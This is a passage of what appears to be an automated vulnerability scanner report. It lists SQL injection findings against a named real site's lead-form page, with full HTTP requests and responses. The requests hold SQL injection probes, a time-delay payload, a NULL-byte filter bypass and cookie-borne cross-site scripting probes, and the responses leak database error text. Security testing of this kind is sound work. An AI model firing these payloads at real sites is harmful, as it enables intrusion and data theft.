Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ufnckb7bp9qpbv7ckhi8s1tnd3; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.114. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=20ns8qefsrcr3meheatc0b1784; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.115. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vgq61pjv6ju2dj0c561lc9n465; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.116. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00'&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:59:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6798
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1969__Business expansion&attributeId_400=1976__Yes&attributeId_401=1980__$5,0' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00''&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:59:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.117. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_398 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_398 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_398 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No'&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 